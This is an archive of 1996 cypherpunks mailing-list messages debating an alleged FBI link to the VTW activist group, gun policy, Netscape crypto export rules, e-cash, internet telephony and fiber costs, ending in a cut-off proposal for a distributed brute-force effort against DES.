>>It is no coincidence that the Tree of Liberty needs to be watered with
>>blood on occasion.

Nope, that wasn't me who said that. I don't normally quote the words of 
slave owners on the subject of liberty.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Tue, 23 Jul 1996 03:57:10 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
In-Reply-To: <199607220832.CAA03981@zifi.genetics.utah.edu>
Message-ID: <199607221614.MAA12400@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Anonymous writes:
> FBI Special Agent Safdar is upset enough by the revelation
> of his true identity to issue a quick denial (on a sunday night, to get
> more OT no doubt), but he doesn't even bother to try to refute the 
> central truth that his cover has been blown by a careless operator at
> his home office who verified his employment and offered to take a message
> for him.

You really are on drugs. The question is, which ones?

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rich Graves <rich@c2.org>
Date: Tue, 23 Jul 1996 17:54:44 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
In-Reply-To: <199607220832.CAA03981@zifi.genetics.utah.edu>
Message-ID: <Pine.GUL.3.94.960722122319.8274I-100000@Networking.Stanford.EDU>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

No, he's not a special agent, silly; just a regular old agent.

- -rich

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQBVAwUBMfPVXpNcNyVVy0jxAQHBKAIAjDJP17uJ6klS5vepS1c46i3JnSBoBAYz
M48l8Qgemx6ZnQlEob8cnH1WHcWRfdnM01lc2+WYfOnndn9VsIfGOw==
=oOY8
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Tue, 23 Jul 1996 04:30:51 +0800
To: snow <snow@smoke.suba.com>
Subject: Re: <rant> Re: Devil's Bargain
In-Reply-To: <Pine.LNX.3.93.960721220053.130P-100000@smoke.suba.com>
Message-ID: <Pine.SV4.3.91.960722122058.863K-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


>      I won't even go into the amount of coverage this crash got compared to

   No surprise when we consider what the alternative is for the media to 
concentrate on. Can we say felonious misappropriation of FBI files?

What a godsend these crashes and Olympics are for the Clintonistas and 
their fellow-travelors in the press. A plausible story to talk about , 
long enough so that there is not time left in the Cartoon News show, to 
ask, why is the White House running around saying that no one can recall 
who hired Craig Livingstone.

Oh wait, the dead guy musta done it. Yeah, that's the ticket.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Jul 1996 14:51:53 +0800
To: cypherpunks@toad.com
Subject: Re: Special Agent Safdar
Message-ID: <2.2.32.19960722193307.00b21088@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

At 02:32 AM 7/22/96 -0600, Anonymous wrote:
>FBI Special Agent Safdar is upset enough by the revelation
>of his true identity to issue a quick denial (on a sunday night, to get
>more OT no doubt), but he doesn't even bother to try to refute the 
>central truth that his cover has been blown by a careless operator at
>his home office who verified his employment and offered to take a message
>for him.

Denial?? Sarcasm perhaps...  No "denial" I could see.

As for your "evidence", it is pretty shaky.  Such as the part about not
having a drivers license.  Since when is government regulation of driving
proof of existence?  

>We don't have to wonder a second longer about the motives behind
>Safdar\VTW\FBI's collection of names of crypto-dissidents, their
>support of the Leahy crypto control bill, their refusal to
>denounce it even today, their support of the digital telephone
>act, the disinformation to make us believe otherwise and all
>the other lies. And what about the money?

Why would they have to operate a dummy organization?  All they have to do is
get the names of the subscribers on this list.  Much more cost effective.

>We must call on the other organizations, like EPIC, EFF, CDT, and ACLU
>to denounce the VTW\FBI fraud. Their board of directories, Blaze and
>Schneier to face the truth in public that they they have been used.
>The net as a whole to demand its pound of cyberflesh.

And not to forget all the free code that Blaze and Schneier have handed out
over the years.  Maybe that is a plot as well.  Maybe the typos in Applied
Cryptography are a secret conspiracy to weaken the cryptography of the
nation.  Next thing I expect you to say is that Queen Elisabeth is a drug
dealer and/or other LaRouche style rants.

I judge the above individuals by their deeds, not just by their words.  They
have accomplished much in the areas of preserving privacy and cryptography.
What have you done lately?

>There are very big questions to be answered now and we must not
>forget to keep asking them until they have been. How high did
>this operation go? Agent Safdar is no Olly North! He didn't
>do this on his own. Who ordered this?

The voices in your head?  Actually, I have more interest in your motives
than his.

>This is exactly like the FBI in the 1960s and civil rights groups.
>In the hands of the right reporter, this could and should
>bring slick willie right on down.

Interesting that you should bring up the FBI actions against dissenting
groups... Actually, your screeds read like some of the stuff the FBI sent to
the Black Panthers in the 60s and 70s. The screeds were written in the same
manner, by an anonymous source, to discredit others in the organization.
Your texts seem designed to cause mistrust amongst those who are willing to
fight for their own freedom.  (Especially amongst those who are not involved
in the middle of the fray.)

Your accusations are not accomplishing anything constructive.  I do not
believe that they were designed to either.  I believe that they were
designed to sow mistrust in the individuals who are making real progress
against the Government held position that they have the right to spy on our
every move.

So far, you have not given any proof as to why we should believe you.  Given
the vitriolic nature of your screeds, I see no reason to do so.


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQEVAwUBMfPVPeQCP3v30CeZAQHiWQf+LCxtk/q4DmbLjJBrkU0aBVa8sDtWkMOU
O2UA8/S0HwnYRy+DW+Hh5CUWM213LOw4gSwTrfz/y8Wdo7ErloV4orM45gKkZxSS
RMq25GtSjpqJUrfWUnMKYhtc97NGkg0tOQU+D7c+LY+8IP5CK6JQh7k639C2q9Ic
oKVxTlNO3xQ6PJiXB0oW21xWTTOC+WgC0OnRUeFGAnsWEXMZg5MBLrIMkLcqehBE
Cgs6lIQEz4NfHWBAD3rwyEnXbxtP5MRK842Gorol3D27aLu8DEUyHddAeWLAQLZv
bQUFR0liOgKrdusLDET6+NGv5RzmgT7E0iZ/abCObXaGQvPjUMpFMQ==
=vJY8
-----END PGP SIGNATURE-----
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Dan Weinstein" <djw@vplus.com>
Date: Tue, 23 Jul 1996 08:54:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
Message-ID: <199607221945.MAA19816@ns1.vplus.com>
MIME-Version: 1.0
Content-Type: text/plain


On 22 Jul 96 at 8:38, you wrote:

> I don't know why you're quoting your own licensing agreement to me. 
> When I said, "you need no permission to provide these products," by
> "you" I was referring to your company, Netscape.  As in, you don't
> need the NSA's permission to write and sell good crypto
> domestically, even if (arguably) they can limit export.

I missed what you meant, it was late and I was thinking you were 
refering to RE-distribution by those that downloaded it.  You also 
have made an error, I am not associated with Netscape.

Dan Weinstein
djw@vplus.com
http://www.vplus.com/~djw
PGP public key is available from my Home Page.
All opinions expressed above are mine.

"I understand by 'freedom of Spirit' something quite definite -
the unconditional will to say No, where it is dangerous to say
No.        
           Friedrich Nietzsche




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: t byfield <tbyfield@panix.com>
Date: Tue, 23 Jul 1996 06:20:35 +0800
To: cypherpunks@toad.com
Subject: Re: the VTW---FBI Connection
In-Reply-To: <199607220251.UAA02057@zifi.genetics.utah.edu>
Message-ID: <v03007801ae196b93c914@DialupEudora>
MIME-Version: 1.0
Content-Type: text/plain


Net reporter team Alice and Bob wrote:

> I) They appear to have no financial support or funding source. They
> II) They are secretive about their location, and do not seem to have
> III) On a tip from a "friend" we learned that the power leader behind VTW
> IIII) We didn't believe this without external verification. So we called

	I think you're onto something, but no one will believe you until you
come up with a few more damning "coincidences"--say, IIIII and IIIIII.

Ted






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: ichudov@algebra.com (Igor Chudov @ home)
Date: Tue, 23 Jul 1996 10:51:59 +0800
To: shamrock@netcom.com (Lucky Green)
Subject: Re: Responding to Pre-dawn Unannounced Ninja Raids
In-Reply-To: <v02120d0dae18c81ec513@[192.0.2.1]>
Message-ID: <199607221805.NAA26381@manifold.algebra.com>
MIME-Version: 1.0
Content-Type: text


Lucky Green wrote:
> 
> At 21:55 7/21/96, Igor Chudov @ home wrote:
> 
> >As I said, the kid who hit me in the head with a stick was 3-4 years
> >younger than me. You skipped that part. Correspondently, I could beat
> >him easily (I did, but his mother soon interrupted me), which was
> >obvious to him. So he had plenty of information that would deter a
> >rational person. He had all the reasons to "to curb his impulse", as
> >you said, and he could have thought about his punishment.
> 
> Yes, he hit you. But the question relevant to this discussion is: would he
> have hit you had you been carrying a firearm, risking not just being beat
> up, but death itself? I sincerely doubt it. In fact, one could say that you
> were hit *because* you didn't carry a firearm. The truth is, an armed
> society is a polite society.

The threat was sufficient for him to make a rational choice. He did
NOT make a rational choice.

I ran out of arguments, so I'll stop right here.

	- Igor.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 23 Jul 1996 11:39:05 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: Netscape
In-Reply-To: <199607221538.IAA22007@mail.pacifier.com>
Message-ID: <31F3E077.41C6@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


jim bell wrote:
> 
> At 07:41 AM 7/22/96 GMT, Dan Weinstein wrote:
>
>>Then you need to read the license agreement:
>>
>> 1. Netscape Communications Corporation ("Netscape") grants to you a
>> non-exclusive, non-sublicensable, license to use this Beta version of
>> the Netscape network navigator (the "Software"), in binary executable
>> form for evaluation and trial use purposes only.  THIS SOFTWARE
>> CONTAINS CODE THAT DISABLES MOST OF ITS FEATURES AFTER SEPTEMBER 17,
>> 1996.
> 
> I don't know why you're quoting your own licensing agreement to me. 
> When I said, "you need no permission to provide these products," by
> "you" I was referring to your company, Netscape.  As in, you don't
> need the NSA's permission to write and sell good crypto domestically,
> even if (arguably) they can limit export.

Note that, while Dan is my brother, he doesn't work for Netscape.  You
really need to check those email addresses before you jump to
conclusions.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Hettinga <rah@shipwright.com>
Date: Tue, 23 Jul 1996 14:10:55 +0800
To: snow <alano@teleport.com>
Subject: [Noise] Hettinga Sees Colors...
In-Reply-To: <2.2.32.19960720183725.00e38e60@mail.teleport.com>
Message-ID: <v03007628ae19621ca0de@[206.119.69.46]>
MIME-Version: 1.0
Content-Type: text/plain


At 10:00 PM -0400 7/21/96, snow wrote:
> On Sat, 20 Jul 1996, Alan Olsen wrote:
> > At 10:10 AM 7/20/96 -0800, Vinnie Moscaritolo wrote:
> > >Speaking of Bob Hettinga put it to words best, told me that standing
>on the
> > >Concord bridge he could see the colors of the American flag eminating
> > >outwards to the rest of the country. Yup this is where it all started..
> > Should teach him not to drink so much in the combat zone in Boston. ]:>
>
>      Doesn't sound like he was drinking. Or if it was liquid, he didn't
> drink more than a drop or two...


Okay, Okay, Okay...

Speaking as a Genuine (unconvicted ;-)) Felon and Certified-Insane Acid
Casualty, that was probably a fair shot. However...

About six weeks ago (as measured by the household clutter-depth since
then...) my sister-in-law, her husband (a comptroller for a chip-company),
their kids, my wife and I went to Concord to look at the "rude bridge"
where the first shots of the American revolution were fired.  Actually
choked me up a bit. Never figured on that.

Anyway, I was standing there at the monument to the British war dead ;-),
and said to the kids (ages 15, 13, and 11), "Guys, right here, on this
spot," (they looked down) " is were America [sic] started. If you could
imagine the ground here painted red, white and blue, and then the colors
radiating out from here in all directions", (they looked around) "from the
Atlantic to the Pacific, to Alaska and Hawaii, and bunch of islands in both
oceans. Oh, yeah. Even the Moon." Then they looked up.

Then they caught themselves, and looked at *me*, with classic adolescent
disdain, like I was from Mars. "Oh. *Right*, Uncle Bob..."

;-).

Same kids gifted me this Christmas with a polartec jester's cap (complete
with bells, handy when shovelling in a blizzard in, ahem, February?). When
they got here, I got a pair of Lennon-looking sunglasses with holograms of
Tex Avery eyeballs on them. Tokens of esteem for their Uncle Bob.


Hmmm. Maybe I *did* see colors out there in Concord. Greaaat visuals. Just
don't move your head too fast, man, or you'll miss 'em....

Cheers,
Bob Hettinga

-----------------
Robert Hettinga (rah@shipwright.com)
e$, 44 Farquhar Street, Boston, MA 02131 USA
"'Bart Bucks' are not legal tender."
                -- Punishment, 100 times on a chalkboard,
                       for Bart Simpson
The e$ Home Page: http://www.vmeng.com/rah/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: declan@well.com (Declan McCullagh)
Date: Tue, 23 Jul 1996 08:34:25 +0800
To: cypherpunks@toad.com
Subject: Canada investigating Net-regulations -- call CBC-Radio now!
Message-ID: <v01510103ae1977751dfa@[204.62.128.229]>
MIME-Version: 1.0
Content-Type: text/plain


[David Jones is the head of EF-Canada. Call CBC Radio with your comments
now! (I did, and left them on the voice mailbox that Morning Edition
graciously provided.) --Declan]


>Return-Path: <efc-talk-owner@insight.mcmaster.ca>
>Date: Mon, 22 Jul 96 11:55:41 EDT
>From: djones@insight.mcmaster.ca (David Jones)
>To: efc-talk@insight.mcmaster.ca
>Subject: call CBC with your thoughts on BC Attorney General's remarks
>Sender: efc-talk-owner@insight.mcmaster.ca
>Precedence: bulk
>Reply-To: djones@insight.mcmaster.ca (David Jones)
>X-Efc-Web-Site: http://www.efc.ca
>X-Efc-Archive: gopher://insight.mcmaster.ca/11/org/efc
>
>        Murmurings about Internet regulation in British Columbia
>
>I just finished a very brief interview on CBC-Radio in Vancouver.
>They called asking for a comment on the BC Attorney General's
>statement that he has instructed his ministry to investigate whether
>the Internet can be regulated.  The reason this is in the news
>is because of the so-called "white power" and "hate" web pages that
>are now available through a BC Internet Service Provider (Fairview Tech),
>after being kicked off an Ontario ISP's computers (Pathyway Communications).
>
>
>I hadn't had my morning coffee, so perhaps you can be more articulate
>on this issue that I was.  I encourage you to call the CBC-Radio's
>"talk-back lines" at (604) 662-6976 -- they are inviting comments
>on this issue.  Seriously, if you don't want the BC Attorney General
>to regulate the Internet, speak now or forever hold your peace.
>
>
>Background (from Vancouver Sun)
>
>  B.C. Internet provider is the largest Canadian site for racist material
>    gopher://insight.mcmaster.ca/00/org/efc/media/vancouver-sun.19jul96a
>
>  Hate on Internet investigated
>    gopher://insight.mcmaster.ca/00/org/efc/media/vancouver-sun.19jul96b
>
> Don't expect easy solutions to cyberspace abuse
>    gopher://insight.mcmaster.ca/00/org/efc/media/times-colonist.14jul96
>
>
>See also:
>
>  "Skin-Net"
>        http://www.ftcnet.com/~skinhds/main.htm
>
>  "Freedom Site in Exile"
>        http://www.ftcnet.com/~freedom/
>
>
>- - - - - - - - - - - - - - - - - - - - - - -
>David Jones    --  Electronic Frontier Canada
>djones@efc.ca  --  http://www.efc.ca/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 23 Jul 1996 16:39:43 +0800
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Netscape
In-Reply-To: <v02120d04ae1763d7df01@[192.0.2.1]>
Message-ID: <31F3E441.446B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green wrote:
> At 15:27 7/20/96, Tom Weinstein wrote:
> 
>> Why not consider what the consequences will be?  Do you seriously
>> believe that this will make the government stop enforcing ITAR?  Do
>> you believe it will make them change the law?  No.  What it will do
>> is make them remove our permission to distribute this stuff.
> 
> I doubt that. PGP has been distributed for years with less safeguards
> than Netscape. It is available on more free-world sites than Netscape
> US. This did not prompt the powers that be to force MIT to take down
> their site. The feds know that it is impossible to prevent software
> that is available on the net from being exported. Why would they
> harass Netscape once the inevitable happens?

Well, for starters, the genius who put it out there put out a beta,
which has an expiration date, instead of waiting for the final release.
Secondly, millions of people don't use PGP.

Also, notice the simple verification system MIT was allowed to use, and
the complex one we're required to use.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tom Weinstein <tomw@netscape.com>
Date: Tue, 23 Jul 1996 16:39:53 +0800
To: The Deviant <deviant@pooh-corner.com>
Subject: Re: Netscape
In-Reply-To: <Pine.LNX.3.94.960722185601.950C-100000@switch.sp.org>
Message-ID: <31F3E6D9.794B@netscape.com>
MIME-Version: 1.0
Content-Type: text/plain


The Deviant wrote:
> On Sun, 21 Jul 1996, Tom Weinstein wrote:
>
>> A handful of cyperpunks hardly constitutes "widespread polititcally
>> motivated disobedience".  In any case, the demonization has already
>> begun; they point their fingers at the four horsemen of the internet
>> at every oportunity.
> 
> One might say the same thing about 10 or 20 people throwing shipments
> of tea off of boats in boston harbor.

Good point.

>> What I object to is anonymous activists who perform acts at no risk
>> to themselves which make it harder for those of us who are trying to
>> bring strong crypto to everyone.
> 
> Why?  Because they can do it without risk?  The way I see it, if you
> can do something that should be done, and you can do it at no risk to
> yourself, then its all the better.

Fine.  Please do it with something you write yourself, not with our
products.

>> The first step is to create at least a strong minority.  A handful of
>> cypherpunks can be largely ignored.  We have to get the general
>> public using and educated about strong crypto before civil
>> disobedience will mean anything.
> 
> Hrmm... I'll agree with that... We need to do something to get
> ourselves noticed (and no, I don't mean blowing up the NSA
> headquarters)

Yes, and that's what we're trying to do.  Get strong crypto in the hands
of as many people as we can.  I can hardly wait until we get S/MIME in.

-- 
You should only break rules of style if you can    | Tom Weinstein
coherently explain what you gain by so doing.      | tomw@netscape.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tien@well.com (Lee Tien)
Date: Tue, 23 Jul 1996 11:35:53 +0800
To: cypherpunks@toad.com
Subject: Re: I@Week on crypto export loophole 6/24/96
Message-ID: <199607222041.NAA22392@mh1.well.com>
MIME-Version: 1.0
Content-Type: text/plain


I am fairly sure that at least one U.S. district court (the case name
escapes me) held that the AECA has extraterritorial application.  

Lee Tien  






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: snow <snow@smoke.suba.com>
Date: Tue, 23 Jul 1996 09:46:52 +0800
To: Ernest Hua <hua@xenon.chromatic.com>
Subject: Re: Giving 6 year old kids Uzi's (Was: Responding to Pre-dawn  Unannounced Ninja Raids)
In-Reply-To: <199607221901.MAA28609@server1.chromatic.com>
Message-ID: <Pine.LNX.3.93.960722134213.1025C-100000@smoke.suba.com>
MIME-Version: 1.0
Content-Type: text/plain


On Mon, 22 Jul 1996, Ernest Hua wrote:
> > > Incidentally, if you are interested, I DO have a child (almost 2 yrs),
> > > matter how well he can use it) until he can legal get one himself.  I
> > > will certainly invoke serious wrath (on him and anyone else involved)
> > > if I ever found him with a gun.
> >      Yes, those guns are evil things. Evil I tell you, constantly shooting
> > people for no reason, going off half-cocked and whooping it up all by 
> > their polished oiled ol selves.
> Hmm.  Sarcasm?  Cannot definitively say, but I'll guess it is.

     Only a little bit.

> >      Isn't it funny how otherwise rational people can ascribe intentions
> > and moral alignement (ie. good/evil) to an inert chunk of steel?
> Assuming you are accusing me of such, you should probably point out
> specifically where I said such a thing.  (If I did, it would be bad
> grammar or some such, and I would certainly retract it.)

      Not accusing you specifically, only really mentioning it in passing.
If I was accusing you of it, I would have said so. 

> >      He also taught me the basics of gun saftey, and made sure that
> > I took those classes that were available to me in the areas of gun 
> > saftey and marksmanship.
> You might be missing the mark too, but I thought the subject was
> giving a gun to every child who enters school, not YOURs or SOME
> EXPERT 6 YEAR OLD's special case.

     I was no expert, and I am (IMO) still a lousy marksman. I just don't
have the money to practice _at all_ so I don't keep my guns here in Chicago.

> Yes, if every child was truly an exemplary God-fearing Christian,
> I would probably have fewer objections to giving every child a
> gun.  After all, they would NEVER use it in a fit of rage or
> jealousy or any such sins ...  Right?

     Hmmm... Sarcasm? I _really_ can't tell. 

> Death is permanent.  A child is prone to accidents.  Maybe those
> of you who are just too "special" and "talented" don't need such
> paternalistic frameworks, but I know my child cannot tell right
> from wrong, good from bad.  He will get better over time.  But I

     Are you telling me that I give your kid more credit than you? There 
is a difference between knowing and caring. 

> don't want another child to pay for my son's less than full
> maturity by getting shot.

    There is a difference between teaching a 6 year old proper gun saftey and 
letting the kid carry. 

     If it was you, you said that you were going to let your kid have a gun 
until he was old enough te get it himself. How do you expect him/her to 
know how to use it if you don't teach them? Would you give a kid the keys 
to a car at 16 if they have never been taught how to drive?

  

Petro, Christopher C.
petro@suba.com <prefered for any non-list stuff>
snow@smoke.suba.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Jul 1996 14:33:30 +0800
To: Jonathon Blake <BMCarpenter@trevecca.edu>
Subject: Re: Credit Card to eCash
Message-ID: <2.2.32.19960722205945.00d1b3e8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:08 AM 7/22/96 +0000, Jonathon Blake wrote:
>	Myers:
>
>On Sun, 21 Jul 1996, Myers W. Carpenter wrote:
>
>> 	What would be the problems in setting up a web site to make a
>> charge to a Credit Card/ATM card number and return Cash, like an ATM for
>> the net?
>
>	Eight to ten years, I think.  It is called money laundering.

I find that interesting, since I can do the same thing with a bank machine.
(Or maybe it is only money laundering when you don't get your picture taken
as part of the process.)

The only problem I see is that charges to a credit card can be withdrawn by
the customer within a certain time period after either the billing or
transaction.  (I do not remember which.  It has been a year or two since I
have been responsible for CC transactions.)  The individual could always say
"It was not me" and get away with the e-cash.  Sounds like a BIG risk for
anyone setting up such a site.

>	AFAIK, that was the major legal hassle, when it was first 
>	done. << OK, so it was on a BBS, not the internet.  >>
>
>	Getting people to use it is the other major problem.

That is the big problem with e-cash as it is...  Not everyone has a major
credit card.  Not everyone is willing to go through the hastles and invasion
of privacy involved to set up an account with an e-cash provider.

When getting e-cash is as easy as getting a money order, then there might be
more interest.

---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Tue, 23 Jul 1996 12:02:11 +0800
To: cypherpunks@toad.com
Subject: E-Cash promotion idea
Message-ID: <2.2.32.19960722205947.00d26f84@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


This may or may not fly, but it is at least worth puting out for general
comment...

Have the people in the e-cash biz thought of getting with the various "Cyber
Cafes" around the world to sell e-cash to the patrons.  Done properly, this
could inject e-cash into a community who would both use the cash, as well as
providing privacy and an exchange for real currency.

There is probibly some sort of financial regulation against it, but it is an
idea to look into...
---
Alan Olsen -- alano@teleport.com -- Contract Web Design & Instruction
        `finger -l alano@teleport.com` for PGP 2.6.2 key 
                http://www.teleport.com/~alano/ 
  "We had to destroy the Internet in order to save it." - Sen. Exon
                "Microsoft -- Nothing but NT promises."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: talon57@well.com
Date: Tue, 23 Jul 1996 16:06:47 +0800
To: cypherpunks@toad.com
Subject: Re: ABC news on Internet Telephony
Message-ID: <199607222103.OAA08425@well.com>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

Since this thread has continued I would like to start my comments
by making a public apology to David Sternlight for my bad manners
the other day. He had done nothing to give me cause for my bad
attitude. I was rude and expressed myself poorly. I apologize to
him in particular and to the list in general.

Brian D Williams

- -----BEGIN PGP PUBLIC KEY BLOCK-----
Version: 2.6.2

mQCNAy7eA7wAAAEEAJgUoJWlE/7ntxpdfFKJC0EIx1nPmOrfBkIz3N/qyqPsqY6A
WJ9jx1oNow8sMjFPET6kbMw2cScfVOUisekK7xVQWuADUPscRXg8zI3x0ws9z2KV
ITL+cO7zODIA1+wZS8v14RJpG4dXF1Q9YsydU8T5bodAcsF5TnsfmVh/uI7xAAUR
tChCcmlhbiBEIFdpbGxpYW1zIDx0YWxvbjU3QHdlbGwuc2YuY2EudXM+iQCVAwUQ
MWkT/XsfmVh/uI7xAQEZKgP+M15YYXXdVAufR2cIkg964EoBubvUj/3liKbRpkCC
hPOm9ed/CJR73+IsgIRUot1LrmT9QRQIy7p9rjYSSOK7Wsf3EuU5Vx2iklUQiuy2
zLexnjxf1VWF+RMe1/NG7TO/J7HzqYVAgWb7EiWYNua2NDPSLNmYsJx+BkhPq4jf
vGA=
=sIcA
- -----END PGP PUBLIC KEY BLOCK-----

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMfPYoXsfmVh/uI7xAQGmZgP/afFTovJ7HUfyyfpqnmjP07Gpx6uLSswy
5LFy1YGCQW1/PVpQvS+B+dJB/uj88s6r4OXx7F1GUQbCZfzx6lkD7Bv+EX6f4yvw
7VOBRMQhnHl+H+MD+n/blaR8P1gCx3Yau2uJuT1r8f7f7GccaD+dQJtpabACyz2T
Nh5wo6v/MmA=
=pC7P
-----END PGP SIGNATURE-----

Digitally signed apology ^^^^^^^ pretty neat eh!

Remo Pini wrote:

>--- all the following points are based on swiss circumstances, >
>they may not apply to US ---

A good point, my views are based/biased by being a Chicago based
Ameritech (RBOC) employee.

DISCLAIMER: all opinions are my own, I do not speak for Ameritech
or it's alliance partners. 


>>point to point circuits are more efficiently handled by circuit
>>switching rather than packet switching networks. Nicholas
>>Negroponte wrote an interesting piece about asynchronous vs
>>synchronous, I believe it is in his book "Being Digital." 

>Well, from a users point of view, sending packet data over a
>packet mode bearer service is more efficient (and cheaper). An
>interesting developement in this direction is the PMBS-A/B modes
>of ISDN (packet switching to the public switch). The existance of
>this service suggests its usability.

 I agree 100%, I expressed this poorly. I meant to say that
asynchronous packet data was more efficent over a packet network,
and synchronous data (like voice) was more efficient over a circuit
switched network. I share your admiration of ISDN.

>>ADSL is an interesting attempt at digital telephony but expensive
>>and basically would mean replacing existing central office
>>switches. (backbone bandwidth) 

>We have a well developed DQDB-MAN and ATM net around, and
>bandwidth is available (and getting cheaper by the minute).
>Currently, a onetime investment of around $2500 per client is
>necessary to provide 5MBit/s transfer volume (via the cable TV
>networks or the existing broadband networks)

One of the problems with a conversion to ADSL here would be that
most point to point copper has been replaced with "slick 96" muxes
which use 4 framed T-1's (1.536 mbs) to provide 96 voice channels.
It is difficult to run 6mbs over a 56kbs channel. ;) Of course this
equipment could be replaced. (maybe just new line cards!) The good
news is that it is fiber based. 

>>In a packet network you have to either dedicate a portion of the
>>bandwidth for a synchronous circuit, or you have to have a very
>>fast network and use very small packets (ATM), expensive either
>>way.

>Not if you have a dedicated packet switching network for
>asynchronous packet transfer only. If you use it for both you
>don't have to have a very fast network, you have to have a network
>with predictable and constant packet delay. (that's not the same
>as fast!)

You are correct, actually fast is always the wrong term to use
since we are always refering to a portion of the speed of light.
Because of different technologies and bandwidth some devices have
faster data throughput.

>>A single central office has many times the bandwidth of the
>>widest part of the internet, and the average state has hundreds
>>of CO's. If even a small portion of the Internets current users
>>tried placing a call things would grind to a halt. A huge
>>increase in the number of backbones and their bandwidth would
>>solve this, but who will pay the bill? 

>I guess Internet-telephony is one of the bandwidth killers.

Yes, this is the point I was trying to express.

>>Sometime ago the discussion was on the cost of laying new fiber,
>>may I suggest  the realworld heuristic of "a million dollars a
>>mile."

>There are of course a lot of alternatives:
>- Existing wiring (5 MBit/s over 6 copper wires is possible)
>- Usage of the cable networks
>- Radio transmissions (RITL - radio in the loop)
>- Satellite transmissions

Yes, we should always check the alternatives, but lets face it if
we have to redo the infrastructure, and redig 250 million trenches,
I feel 100% fiber is the way to go.

jim bell <jimbell@pacifier.com> writes

>>Sometime ago the discussion was on the cost of laying new fiber,
>>may I suggest  the realworld heuristic of "a million dollars a
>>mile."

>In most cases, "new fiber" isn't needed, and will probably only be
>rarely needed on long-distance links.  As I understand it, most
>cableways are laid with extra tubes, into which new fiber cables
>can be blown in (using compressed air) long after the trench is
>filled.  The specific example I saw, there were three 2" diameter
>tubes in a larger tube, and according to the contractor (I
>asked...) only one of the tubes would be filled at that time.  In
>addition, while he wasn't sure, he thought that at least some of 
>the 36-fiber cable in that one tube would remain "dark," or unused
>until it was later needed.

>I don't know how expensive it is to add that extra fiber cable
>into an existing tube, but it would be VASTLY cheaper than the
>original trenching operation.  Further, much of the improved
>transmission technology can be used on the older fibers to
>increase their capacity:  A fiber now used to transmit a single
>2.4 gigabit signal can be upgraded, simply using new channelized
>transmitters and receivers to increase the data rate to 8 or 16
>times the previous rate.

Jim, the above quote was by me not Remo Pini. I was giving a rough
figure for new underground fiber, and yes when we have to install
new we always lay extra tubes. The information your contractor
friend gave you was very accurate.

There is still a great need for new fiber, we are still installing
it at a rate of a billion dollars a year.

Brian
Sacred cows make the best hamburgers.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 23 Jul 1996 10:41:10 +0800
To: trei@process.com
Subject: Brute Force DES
Message-ID: <2.2.32.19960722180543.0069c5a8@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:32 AM 7/22/96 -6, Peter Trei wrote:

>Any one up for a distributed brute force attack on single DES? My 
>back-of-the-envelope calculations and guesstimates put this on the
>hairy edge of doability (the critical factor is how many machines can
>be recruited - a non-trivial cash prize would help). 

I volunteer my 120 MHZ Pentium.  A lot more Pentiums are out there now than
a year ago.  That makes it more feasible.  A lot more people with full net
connections.  Like most Americans, I have a flat rate net connection and a
